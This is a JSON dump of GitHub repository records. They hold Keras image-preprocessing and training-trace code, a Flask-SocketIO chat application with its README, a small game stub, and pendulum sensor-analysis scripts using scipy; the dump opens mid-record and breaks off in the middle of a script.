W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dense(maps_count_param*2, W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\n\tmodel.add(Dense(10, W_regularizer=l2(lambda_param)))\n\tmodel.add(Activation('softmax'))\n\n\treturn model\n"
},
{
"alpha_fraction": 0.6139847040176392,
"alphanum_fraction": 0.6393678188323975,
"avg_line_length": 25.392404556274414,
"blob_id": "854df4d583cfed1e91e28d2d21986eca65aa2854",
"content_id": "88b5b05bc4ece203158e3e78308da9a39f8aac2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2088,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 79,
"path": "/imageutils.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nimport numpy as np\n\ndef unpickle(file):\n import pickle\n fo = open(file, 'rb')\n dict = pickle.load(fo, encoding='bytes')\n fo.close()\n return dict\n\ndef display_image(im1,image_size):\n\tim1=im1.reshape((3,image_size,image_size)).transpose(1,2,0)\n\timg = Image.fromarray(im1, 'RGB')\n\timg.show()\n\ndef display_normalized_image(image,image_size,avg_per_channel):\n\tim1=image\n\tfor i in range(0,3):\n\t\tim1[i,:,:] = image[i,:,:] * 128 + avg_per_channel[i]\n\tdisplay_image(im1.astype('uint8'),image_size)\n\ndef load_dataset():\n\tdict={}\n\tfor i in range(1,6):\n\t\tdict1=unpickle('/Users/yves/.keras/datasets/cifar-10-batches-py/data_batch_'+str(i))\n\t\tdict.update(dict1)\n\n\tY_train=dict[b'labels']\n\tX_train=dict[b'data']\n\n\tprint (X_train.shape)\n\t#for k in range(0,X_train.shape[0]):\n\t#\tX_train[k] = reshape(X_train[k])\n\n\tdisplay_image(X_train[0])\n\tdisplay_image(X_train[1])\n\tdisplay_image(X_train[2])\n\n\treturn (X_train,Y_train)\n\ndef normalize(data):\n\tm=np.mean(data)\n\ts=np.std(data)\n\treturn (data-m)/s\n\ndef mean1(data):\n\t''' substract mean per image sample and per color channel'''\n\tfor i in range(0,data.shape[0]):\n\t\tfor j in range(0,data.shape[1]):\n\t\t\tm = np.mean(data[i,j,:])\n\t\t\tdata[i,j,:,:] = data[i,j,:,:]-m\n\treturn data\n\n\n\ndef mean2(data1,data2,data3):\n\t''' substract mean per color channel for training set data1 from all datasets'''\n\tfor j in range(0,data1.shape[1]):\n\t\tm = np.mean(data1[:,j,:])\n\t\tdata1[:,j,:,:] -= m\n\t\tdata2[:,j,:,:] -= m\n\t\tdata3[:,j,:,:] -= m\n\treturn data1, data2, data3\n\ndef whiten(data,epsilon):\n\t''' ZCA whiten per channel '''\n\tn=data.shape[0]\n\tp=data.shape[2] # width of an image ; here we assume square images\n\tfor j in range(0,data.shape[1]): #enumerate color channels\n\t\tx = data[:,j,:,:].reshape(n,p*p) \t\t\t\t\t\t\t\t# x(imagePixels),sample#)\n\t\tprint('before sigma',x.shape)\n\t\tsigma = x.dot(x.T) \n\t\tprint('after sigma\\n')\n\t\tsigma /=n\n\t\tu,s,v = np.linalg.svd(sigma)\n\t\txWhite = np.diag(1./np.sqrt(s + epsilon)).dot(u.T).dot(x)\t\t# compute PCA\n\t\txWhite = u.dot(xWhite) \t\t\t\t\t\t\t\t\t\t\t# compute ZCA\n\t\tdata[:,j,:,:]=xWhite.reshape(n,p,p)\n\treturn data\n\n\n\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6973684430122375,
"avg_line_length": 27.375,
"blob_id": "0972656723ee08fd201aa385063e708ffa64c6e1",
"content_id": "fbe2e37173d34f20d43323d7b432921386b161be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 228,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 8,
"path": "/learn.sh",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "timestamp=`date +%d%m%y-%H%M%S`\nfilename=record/test$timestamp.log\ntouch $filename\npidfile=`hostname`.pid\nkill `cat $pidfile`\npython convnet3.py 200 $timestamp ${1:-NO} >> $filename 2>&1 & \necho $! > $pidfile\ntail -f $filename\n\n"
},
{
"alpha_fraction": 0.6633663177490234,
"alphanum_fraction": 0.7029703259468079,
"avg_line_length": 19.200000762939453,
"blob_id": "576c01866162c73b627d18f16e505254625f4ca3",
"content_id": "e6392c2f29a4554fc5a2f80dbaeb6c898bb8053f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/plot.sh",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "gnuplot --persist << FIN\nset key left top\nplot \"plot.data\" using 1:2, \"plot.data\" using 1:3\nexit\nFIN\n"
},
{
"alpha_fraction": 0.6430910229682922,
"alphanum_fraction": 0.6476751565933228,
"avg_line_length": 40.297298431396484,
"blob_id": "bfd3d2aa0d7ca17980e28ef8c1fe4a06a6cfc73c",
"content_id": "de3c625a33e3fb17fa63172f2cb86113325a6ae7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 37,
"path": "/trace.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "from keras.callbacks import Callback\nfrom keras import backend as K\nimport numpy as np\n\nclass TraceWeights(Callback):\n\n\tdef __init__(self,mode,engine):\n\t\t''' mode should be 0 for training, 1 for testing , engine is used to get current batch data'''\n\t\tself.mode = mode\n\t\tself.engine = engine\n\n\tdef on_train_begin(self, logs={}):\n\t\tprint('train begin')\n\n\tdef print_ndarray_stats(self, s, i, X):\n\t\t''' i layer number,\n\t\t\ts data name,\n\t\t\tX data array '''\n\t\t#print(\"layer \",i, s, \" shape : \", X.shape,\" max : \", np.amax(X),\" min : \",np.amin(X),\" avg : \", np.mean(X)\\\n\t\t#\t\t ,\"NaN count : \", np.count_nonzero(np.isnan(X)), \"non Nan count : \", np.count_nonzero(~np.isnan(X)) )\n\t\tprint(\"L:\",i, \":\",s, \":\", X.shape,\":\", np.amin(X),\":\",np.amax(X),\":\", np.mean(X),\":\", \\\n\t\t\t np.count_nonzero(np.isnan(X)), \":\", np.count_nonzero(~np.isnan(X)) )\n\n\tdef on_batch_begin(self, batch, logs={}):\n\t\t''' on batch begin we display the statistics of the weights and the outputs to see how NaN propagate '''\n\t\tnumber_of_layers= len(self.model.layers)\n\t\tfor i in range(1,number_of_layers):\n\t\t\tweights=self.model.layers[i].get_weights()\n\t\t\tif len(weights)>0:\n\t\t\t\tself.print_ndarray_stats(\"W\", i,abs(weights[0]))\t# trace gradient scale\n\t\t\tget_layer_output = K.function([self.model.layers[0].input,K.learning_phase()],[self.model.layers[i].output])\n\t\t\tX = self.engine.X_batch_current\n\t\t\tlayer_output = get_layer_output([X,self.mode])[0]\n\t\t\tself.print_ndarray_stats(\"Y\", i,abs(layer_output))\t\t# trace activation scale\n\n\n#IDEA : use a much smaller lambda"
}
] | 10 |
qmpython/Games | https://github.com/qmpython/Games | 749e642f48cffac98a8533371da8de124103e8e9 | 06e825b4e85241b14f8249ab3a45d0c9bb14183a | f0b25c59ad39c7738f92c0a7ad9a839e101f62a1 | refs/heads/master | 2021-05-18T10:39:46.821422 | 2020-03-30T04:13:26 | 2020-03-30T04:13:26 | 251,214,270 | 1 | 0 | null | 2020-03-30T05:53:26 | 2020-03-30T05:56:35 | 2020-03-30T13:19:00 | Python | [
{
"alpha_fraction": 0.4383561611175537,
"alphanum_fraction": 0.4383561611175537,
"avg_line_length": 9.428571701049805,
"blob_id": "add91ecf7b4fc1dc9503c9e83e873bec7063964a",
"content_id": "4ae4d60b8e786294dade835a7217aa837fc3a107",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 7,
"path": "/main.py",
"repo_name": "qmpython/Games",
"src_encoding": "UTF-8",
"text": "def game():\n print(\"游戏开始开发\")\n\n\n\nif __name__ == '__main__':\n game()\n"
}
] | 1 |
maguilera0810/project2 | https://github.com/maguilera0810/project2 | 19edecad350a8b783fe86726ca89dcc75d8cb5b3 | 006d84de0b03ffd8c538f8393c8f72ce120641f6 | 0c5c613812a2ad149092648fcda803b8bbee6e3e | refs/heads/master | 2020-09-30T05:09:18.223100 | 2019-12-29T07:24:09 | 2019-12-29T07:24:09 | 227,211,431 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.739847719669342,
"alphanum_fraction": 0.7430202960968018,
"avg_line_length": 36.5476188659668,
"blob_id": "ca2052cd7f1b446b35504c88e917bcbbce4bb8e5",
"content_id": "4d61960ad5c2beaf798fdf0aa11090085194d31f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1576,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 42,
"path": "/README.md",
"repo_name": "maguilera0810/project2",
"src_encoding": "UTF-8",
"text": "# Project 2\n\nWeb Programming with Python and JavaScript\n\nWelcome to Project 2: Flack\n\nYoutube:\n https://youtu.be/OEyTyKZ_kgI\n\nStructure:\n\nStatic directory:\n \n -index.js: file. This file contains functions related to the socket connection.\n There are also a couple of functions which were created to obtain the date in a readable format.\n \n -css/style2.css: This file contains all styles of mi project\n \n -images: This folder contains all images of the project\n\n\nTemplates directory:\n\n - channels.html: This page appears when a channel is selected by some user so he/she can type \n and submit a message into the channel.\n\n - index.html: It corresponds to the main page. Here the user is able to create a new channel or to start a private\n chat with an specific user.\n\n - logged.html: At this html the registration of an username is confirmed. This page appears only 1.5 seconds \n and then the user is redirected to the main page.\n\n - register.html: It shows a register form.\n\n\napplication.py: This file ontains all of the logic on the server side.\n\nPersonal touch: As an additional feature, I placed the messages of the current user on the right and the messages \nof other users on the left, and set a random color for each user when logging in. In addition, I implemented a logout.\n\nPersonal touch: as an additional feature, I placed the messages of the current user on the right and the messages\nfrom other users on the left, and I set a random color for each user when signing in. In addition, I implemented a logout."
},
{
"alpha_fraction": 0.5257879495620728,
"alphanum_fraction": 0.5412607192993164,
"avg_line_length": 26.91200065612793,
"blob_id": "e786a3da298b2c661506d5f7098483c5e8f6130c",
"content_id": "3ca615236732063fe4549ebfed763a0cc0cab959",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3490,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 125,
"path": "/application.py",
"repo_name": "maguilera0810/project2",
"src_encoding": "UTF-8",
"text": "\nimport os\nfrom random import randint\n\n\nfrom flask import Flask, render_template, jsonify, request, redirect, url_for, session\nfrom flask_session import Session\nfrom flask_socketio import SocketIO, emit\nfrom flask_cors import CORS, cross_origin\n\n\napp = Flask(__name__)\n\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\napp.config['CORS_HEADERS'] = 'Content-Type'\nSession(app)\n\ncors = CORS(app)\nsocketio = SocketIO(app)\n\n\nhexa = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\",\n \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n\nchannels_multi = []\nchannels = []\nusers = []\ninicio = True\nmsg = {\"asdf\": [\"hola como estas?\", \"bien y tu\", \"cuando y donde?\", \"bien y tu\",\n \"cuando y donde?\", \"bien y tu\", \"cuando y donde?\", \"bien y tu\", \"cuando y donde?\"]}\n\n\ndef random_color():\n c = \"#\"\n for i in range(6):\n c += hexa[(randint(0, 1000)*randint(0, 1000) +\n randint(0, 500)*randint(0, 500)) % len(hexa)]\n return c\n\n\[email protected](\"/\", methods=[\"POST\", \"GET\"])\ndef index():\n codigo = 1\n\n if request.method == \"POST\":\n channel = request.form.get(\"channel_name\")\n if (channel not in channels):\n channels_multi.append((channel, session['user'], session['color']))\n channels.append(channel)\n msg[channel] = []\n else:\n codigo = 420\n return render_template(\"index.html\", channels=channels_multi, codigo=codigo)\n\n\[email protected](\"/logout\")\ndef logout():\n users.remove(session[\"user\"])\n session.clear()\n return redirect(url_for(\"index\"))\n\n\[email protected](\"/register\", methods=[\"POST\", \"GET\"])\ndef register():\n codigo = 1\n print(session, \"/////////////SESSION\")\n if 'user' in session:\n print(\"--------------------------------qqqqqqqqqqqqqqqqqqqqq\\n-----------\")\n redirect(url_for(\"index\"))\n elif request.method == \"POST\":\n user = request.form.get(\"nickname\")\n if (user not in users):\n users.append(user)\n session[\"user\"] = user\n # session[\"color\"] = colores[randint(0, len(colores)});-1)]\n #session[\"color\"] = colores[i[0] % len(colores)]\n session[\"color\"] = random_color()\n print(session, \"------\\n----\")\n\n return render_template(\"logged.html\", user=user, color=session[\"color\"])\n else:\n codigo = 69\n return render_template(\"register.html\", users=users, codigo=codigo)\n\n # if request.method == \"GET\":\n # return render_template(\"register.html\")\n # else:\n # return redirect(url_for('index'))\n\n\[email protected](\"/channel/<string:channel>\", methods=[\"GET\"])\ndef channel_creation(channel):\n try:\n return render_template(\n \"channels.html\",\n channel=channel,\n msg=msg[channel],\n user=session[\"user\"]\n )\n except:\n print(\"-------------------------\")\n\n return redirect(url_for('index'))\n\n\[email protected]('send message')\ndef newMessage(msg2):\n if (len(msg[msg2['channel']]) == 100):\n msg[msg2['channel']].pop(0)\n msg[msg2['channel']].append(msg2)\n\n print(msg2, \"*************************************\")\n emit(\n \"new message\",\n {\n \"mensaje\": msg2['mensaje'],\n \"username\": msg2['username'],\n \"date\": msg2['date'],\n \"channel\": msg2['channel'],\n \"color\": msg2['color']\n\n },\n broadcast=True\n )\n"
}
] | 2 |
ShuowangHe/IIB-Project2 | https://github.com/ShuowangHe/IIB-Project2 | c68a59c4f9a15f7148735923a06a8b1f32a90b5b | d0fe8c00ace56c32b45356b5806738d734349642 | 24f5570e03d2e9f44907f9f908278d247bfd3c13 | refs/heads/master | 2022-12-26T23:27:52.287096 | 2020-05-27T12:28:23 | 2020-05-27T12:28:23 | 244,227,033 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6365240216255188,
"alphanum_fraction": 0.6726952195167542,
"avg_line_length": 29.226667404174805,
"blob_id": "10c56eeb8ecea195519e9ef6793d8edd3e17c95b",
"content_id": "775075882b84617b41b019264e5445ed9ca7818d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2267,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 75,
"path": "/param_optimiser.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.signal import find_peaks\nfrom scipy.optimize import fmin_bfgs\nfrom matplotlib import animation\n\nfile = '/Users/shuowanghe/github/IIB-Project/test.csv'\ndata = genfromtxt(file,delimiter=',')\ntimestamps = data[:,0]\na_r = data[:,1]\na_theta = data[:,2]\ntheta_dot = data[:,3]\n#get max theta dot points to get theta=0 points\ntheta_zeros,_ = scipy.signal.find_peaks(abs(theta_dot),prominence=0)\nprint(timestamps[theta_zeros])\nfirst_theta_zero_idx = theta_zeros[1]\ntimestamps_trunc1 = timestamps[first_theta_zero_idx:]\ntheta_dot_trunc1 = theta_dot[first_theta_zero_idx:]\ntheta_measured = scipy.integrate.cumtrapz(theta_dot_trunc1,timestamps_trunc1)\ntimestamps_trunc1 = timestamps_trunc1 - timestamps_trunc1[0]\n\nydata = np.gradient(theta_dot,timestamps)\n\nm = 0.4\ng = 9.81\nl = 0.39\nJ = 1\nfric = 0.08\npopt = np.array([m,l,J,fric])\ndt = 1/50\ntime_elapsed = 20\ntheta = np.zeros(int(time_elapsed/dt))\ntheta[0] = theta_measured[0]\ntheta[1] = theta_measured[1]\nT = np.zeros(int(time_elapsed/dt))\n\ndef func(params,*args):\n m,l,J,fric = params\n theta,theta_prev,t = args\n g = 9.81\n theta_next = (2*theta + (fric*dt/(2*J)-1)*theta_prev -m*g*l/J*np.sin(theta)*dt**2)/(1+fric*dt/(2*J))\n error = abs(theta_next - theta_measured[t+1])\n return error\n\npara = []\n\nfor k in range(1,len(theta_measured)-601):\n popt = fmin_bfgs(func,popt,args=(theta[k],theta[k-1],k))\n para.append(popt)\n m,l,J,fric = popt\n theta[k+1] = (2*theta[k] + (fric*dt/(2*J)-1)*theta[k-1] - m*g*l/J*np.sin(theta[k])*dt**2)/(1+fric*dt/(2*J))\n\nprint(np.mean(para,0))\npopt = np.mean(para,0)\n\nfor k in range(1,int(time_elapsed/dt-1)):\n m,l,J,fric = popt\n theta[k+1] = (2*theta[k] + (fric*dt/(2*J)-1)*theta[k-1] -m*g*l/J*np.sin(theta[k])*dt**2)/(1+fric*dt/(2*J))\n\nplt.plot(np.linspace(0,time_elapsed,int(time_elapsed/dt)),theta)\nplt.plot(timestamps_trunc1[:-1],theta_measured)\nplt.xlabel('Time (s)')\nplt.ylabel('Angle (rad)')\nplt.show()\n\nprint(para)\nplt.plot(range(len(para[:][0])),para[:][0])\nplt.plot(range(len(para[:][0])),para[:][1])\nplt.plot(range(len(para[:][0])),para[:][2])\nplt.plot(range(len(para[:][0])),para[:][3])\nplt.show()\n"
},
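The theta[k+1] update that the fitting loop above (and theory.py below) steps through is the standard central-difference discretisation of the damped pendulum equation J·θ̈ + c·θ̇ + mgl·sin θ = 0, with c = fric. Spelling it out (my restatement, not text from the repository):

\ddot{\theta}_k \approx \frac{\theta_{k+1} - 2\theta_k + \theta_{k-1}}{\Delta t^2},
\qquad
\dot{\theta}_k \approx \frac{\theta_{k+1} - \theta_{k-1}}{2\,\Delta t}

Substituting into the equation of motion and solving for θ at the next step gives exactly the line of code:

\theta_{k+1} = \frac{2\theta_k + \left(\frac{c\,\Delta t}{2J} - 1\right)\theta_{k-1} - \frac{mgl}{J}\sin(\theta_k)\,\Delta t^2}{1 + \frac{c\,\Delta t}{2J}}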
{
"alpha_fraction": 0.6904761791229248,
"alphanum_fraction": 0.7251700758934021,
"avg_line_length": 28.399999618530273,
"blob_id": "5db66e9477d6a1ad96533c0484555b660af1ea82",
"content_id": "3a58afb34bc46495254aee7167e08135db67f5b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1470,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 50,
"path": "/theory.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.signal import find_peaks\nfrom scipy.optimize import curve_fit\nfrom matplotlib import animation\n\nfile = '/Users/shuowanghe/github/IIB-Project/test.csv'\ndata = genfromtxt(file,delimiter=',')\ntimestamps = data[:,0]\na_r = data[:,1]\na_theta = data[:,2]\ntheta_dot = data[:,3]\n#get max theta dot points to get theta=0 points\ntheta_zeros,_ = scipy.signal.find_peaks(abs(theta_dot),prominence=0)\nprint(timestamps[theta_zeros])\nfirst_theta_zero_idx = theta_zeros[1]\ntimestamps_trunc1 = timestamps[first_theta_zero_idx:]\ntheta_dot_trunc1 = theta_dot[first_theta_zero_idx:]\ntheta_measured = scipy.integrate.cumtrapz(theta_dot_trunc1,timestamps_trunc1)\ntimestamps_trunc1 = timestamps_trunc1 - timestamps_trunc1[0]\n\nxdata = theta_measured\nydata = np.gradient(theta_dot,timestamps)\n\nm = 0.4\ng = 9.81\nl = 0.42\nJ = 1.05\nfric = 0.07\ndt = 1/50\ntime_elapsed = 20\ntheta = np.zeros(int(time_elapsed/dt))\ntheta[0] = theta_measured[0]\ntheta[1] = theta_measured[1]\nT = np.zeros(int(time_elapsed/dt))\n\n\nfor k in range(1,int(time_elapsed/dt-1)):\n theta[k+1] = (2*theta[k] + (fric*dt/(2*J)-1)*theta[k-1] -m*g*l/J*np.sin(theta[k])*dt**2)/(1+fric*dt/(2*J))\n\nplt.plot(np.linspace(0,time_elapsed,int(time_elapsed/dt)),theta)\nplt.plot(timestamps_trunc1[:-1],theta_measured)\nplt.xlabel('Time (s)')\nplt.ylabel('Angle (rad)')\nplt.show()\nplt.show()\n"
},
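A quick sanity check on theory.py's scheme (my sketch, reusing the file's parameter values): for small angles sin θ ≈ θ, so the simulation should reduce to lightly damped simple harmonic motion at natural frequency √(mgl/J), i.e. a period of roughly 5.0 s for m = 0.4, l = 0.42, J = 1.05.

import numpy as np

# Same update as theory.py, started from a small angle and zero velocity.
m, g, l, J, fric, dt = 0.4, 9.81, 0.42, 1.05, 0.07, 1/50
theta = np.zeros(1000)
theta[0] = theta[1] = 0.05    # 0.05 rad, small enough that sin(theta) ~ theta
for k in range(1, len(theta) - 1):
    theta[k+1] = (2*theta[k] + (fric*dt/(2*J) - 1)*theta[k-1]
                  - m*g*l/J*np.sin(theta[k])*dt**2) / (1 + fric*dt/(2*J))
expected_period = 2*np.pi/np.sqrt(m*g*l/J)    # ~5.0 s; peak spacing should match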
{
"alpha_fraction": 0.6486880779266357,
"alphanum_fraction": 0.6652068495750427,
"avg_line_length": 50.75149154663086,
"blob_id": "7a1264d0e4d076c72bdd9946a3074a287e611d95",
"content_id": "d29bafd8c9b125fdc9dda3db1b6a28414dda32e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26031,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 503,
"path": "/pendulum.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\nfrom matplotlib import animation\n###-------------------------------------------------------------------------###\n###------------------------UNPACK DATA AND GET ZEROS------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nuserinput_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/onesidepush.csv'\nuserinput = genfromtxt(userinput_file,delimiter=',')\nfreeswing_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/freeswing.csv'\nfreeswing = genfromtxt(freeswing_file,delimiter=',')\ntimestamps,a_r,a_theta,theta_dot = userinput[:,0], userinput[:,1], userinput[:,2], userinput[:,3]\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Smooth the radial acceleration signal to find theta=zeros\nfiltered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\ntheta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\nstart = theta_zeros[0]\nfree_start_zeros,_ = find_peaks(savgol_filter(freeswing[:,1],window_length=21, polyorder=2),prominence=0.5)\nfree_start = free_start_zeros[0]\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n timestamps = data[:,0]\n a_r = data[:,1]\n theta_dot = data[:,3]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\n start = theta_zeros[0]\n #integrate theta and distribute drift before every zero\n theta_int_once = cumtrapz(theta_dot[start:],timestamps[start:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[start:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = start #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function 
for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data #find theta=zeros\n timestamps = data[:,0]\n theta_dot = data[:,3]\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=0.5)[0][0]\n theta_double_dot = np.gradient(theta_dot,timestamps)\n x = np.sin(theta)[start:]\n y = savgol_filter(theta_double_dot,window_length=25, polyorder=3)[start:]\n p = np.polyfit(x,y,deg=1)[0] #fit a line through all of the data points\n return p\n\n#Function for finding where force is being applied\ndef forcefinder(force):\n smooth_force = savgol_filter(force,window_length=45,polyorder=3)\n low_smooth_force = savgol_filter(force,window_length=35,polyorder=3)\n peaks,_ = find_peaks(abs(low_smooth_force),prominence=1)\n peak_matrix = np.zeros((len(peaks),3))\n peak_matrix[:,1] = peaks\n peaks = np.append(peaks,len(smooth_force))\n prev_peak = 0\n count = 0\n for i in peaks:\n mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n begin = mini_peaks_before[-1]+prev_peak\n prev_end = mini_peaks_before[0]+prev_peak\n if count != len(peaks)-1:\n peak_matrix[count,0] = begin\n if count != 0:\n peak_matrix[count-1,2] = prev_end\n prev_peak = i\n count+=1\n return peak_matrix.astype(int)\n\n###-------------------------------------------------------------------------###\n###-------------------------------OPTIMISATION------------------------------###\n###-------------------------------------------------------------------------###\n#Optimise correction parameters for freeswing\ndef force_func(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = get_theta(freeswing)*theta_correction_factor+theta_offset\n theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)*theta_correction_factor\n p = get_gradient(freeswing)*gradient_correction_factor\n force = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\n return sum(abs(force))\nres=least_squares(fun=force_func, x0=[1,1,0])\nprint(\"theta factor: \",res.x[0],\"\\ngradient factor: \",res.x[1],\"\\ntheta offset: \",res.x[2],\"\\ncost: \",res.fun)\ntheta_correction_factor,gradient_correction_factor,theta_offset = res.x[0],res.x[1],res.x[2]\n#get the -mlg/J gradient from fitting the userinput graph\np = get_gradient(userinput)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(userinput)\n#Calculate some force quantity T/J using just the userinput data\nforce = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\nsmooth_force = savgol_filter(force,window_length=25, polyorder=3)\n#Calculate it post corrections from freeswing data\np_corrected = p*gradient_correction_factor\ntheta_corrected = theta*theta_correction_factor+theta_offset\ntheta_dot_corrected = theta_dot*theta_correction_factor\nforce_corrected = theta_correction_factor*filtered_theta_double_dot[start:]-p_corrected*np.sin(theta_corrected[start:])\nsmooth_force_corrected = savgol_filter(force_corrected,window_length=25, polyorder=3)\n#get the indices where force is being applied and released\npeak_matrix = forcefinder(force_corrected)\n#get following data but when force isnt applied\nno_force_times = timestamps[start:]\nno_force_force = force\nno_force_theta = theta[start:]\nno_force_filtered_theta_double_dot = 
filtered_theta_double_dot[start:]\nfor i in range(len(peak_matrix)):\n force_range = range(peak_matrix[(len(peak_matrix)-1-i),0],peak_matrix[(len(peak_matrix)-1-i),2])\n no_force_times = np.delete(no_force_times,force_range)\n no_force_theta = np.delete(no_force_theta,force_range)\n no_force_force = np.delete(no_force_force,force_range)\n no_force_filtered_theta_double_dot = np.delete(no_force_filtered_theta_double_dot,force_range)\n#Optimise correction parameters again but only using no force data\ndef force_func2(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = no_force_theta*theta_correction_factor+theta_offset\n filtered_theta_double_dot = no_force_filtered_theta_double_dot*theta_correction_factor\n p = get_gradient(userinput)*gradient_correction_factor\n force = filtered_theta_double_dot-p*np.sin(theta)\n return sum(abs(force))\nres2=least_squares(fun=force_func2, x0=[1,1,0])\nprint(\"theta factor 2: \",res2.x[0],\"\\ngradient factor 2: \",res2.x[1],\"\\ntheta offset 2: \",res2.x[2],\"\\ncost 2: \",res2.fun)\ntheta_correction_factor2,gradient_correction_factor2,theta_offset2 = res2.x[0],res2.x[1],res2.x[2]\ntheta_corrected2 = theta*theta_correction_factor2+theta_offset2\np_corrected2 = p*gradient_correction_factor2\ntheta_dot_corrected2 = theta_dot*theta_correction_factor2\nforce_corrected2 = filtered_theta_double_dot[start:]*theta_correction_factor2-p_corrected2*np.sin(theta_corrected2[start:])\nsmooth_force_corrected2 = savgol_filter(force_corrected2,window_length=35, polyorder=3)\n#find zero crossings of theta_dot, i.e. when bell is at extremes\ntheta_dot_zeros,_ = find_peaks(-abs(theta_dot_corrected2[start:]),prominence=1)\n#Produce clean force curve\nnoisy_peaks = find_peaks(-abs(smooth_force_corrected2),height=-0.5)[0]\nforce_curve = 